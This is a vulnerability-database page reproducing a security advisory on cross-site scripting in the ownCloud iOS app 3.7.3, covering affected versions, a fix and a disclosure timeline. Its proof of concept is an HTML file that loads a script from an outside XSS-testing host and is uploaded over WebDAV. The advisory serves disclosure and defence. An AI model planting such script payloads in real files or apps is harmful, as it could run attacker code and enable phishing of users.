Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ownCloud iOS Application 3.7.3 Cross Site Scripting

🗓️ 15 Aug 2018 00:00:00Reported by Sylvain HeinigerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

ownCloud iOS App 3.7.3 XSS in WebVie

Code
`#############################################################  
#  
# COMPASS SECURITY ADVISORY  
# https://www.compass-security.com/research/advisories/  
#  
#############################################################  
#  
# Product: ownCloud iOS Application (owncloud.iosapp) [1]  
# Vendor: ownCloud Gmbh  
# CSNC ID: CSNC-2018-016  
# CVE ID: N/A  
# Subject: Cross-Site Scripting in ownCloud iOS Application's WebViews  
# Risk: Low  
# Effect: Remotely exploitable  
# Author: Sylvain Heiniger <[email protected]>  
# Date: 14.08.2018  
#  
#############################################################  
  
Introduction:  
-------------  
HTML pages will be rendered in a WebView in the ownCloud iOS application.  
JavaScript will be executed in this WebView when previewing an HTML file.  
  
The webview is run in a sandbox, so no other data can be read a priori. However, in case the WebView iself were to have a vulnerability, an attacker could access other data of the application. The HTML rendering could also be misused for phishing.  
  
Affected:  
---------  
Vulnerable:  
* ownCloud Version 3.7.3 for iOS  
  
Not vulnerable:  
* ownCloud Android Application  
* ownCloud Server  
* ownCloud Version 3.7.5 for iOS  
  
  
Technical Description  
---------------------  
Send an html file to an ownCloud instance, open it in the iOS application, HTML gets interpreted.  
  
$ cat test.html  
<html>  
<script src="https://hes.xss.ht"></script>  
<script>alert("this JavaScript is interpreted!");</script>  
</html>  
$dave -u admin -p [password] https://[your-instance].owncloud-demo.com/remote.php/webdav/  
dave> put test.html  
put https://7pswlqfpkn.owncloud-demo.com/remote.php/webdav/test.html (117 bytes) (success)  
  
  
Workaround / Fix:  
-----------------  
Since iOS 8 one can use the WKWebView class instead of using UIWebView. Setting the WKPreferences property javaScriptEnabled to false will prevent JavaScript to be run.  
This fixed has been implemented in release 3.7.5 [2].  
  
  
Timeline:  
---------  
2018-08-14: Advisory publication  
2018-07-09: Fix verification  
2018-06-19: Release with fix publication  
2018-03-16: Initial acknowledgment of the vulnerability  
2018-03-14: Contact via HackerOne  
2018-03-13: Discovery by Sylvain Heiniger  
  
  
References:  
-----------  
[1] https://github.com/owncloud/ios  
[2] https://github.com/owncloud/ios/releases/tag/version_3.7.5  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Aug 2018 00:00Current
7.4High risk
Vulners AI Score7.4
owncloudioscross-site scriptingwebviewvulnerabilityjavascriptsecurity advisorywkwebviewreleasephishing
36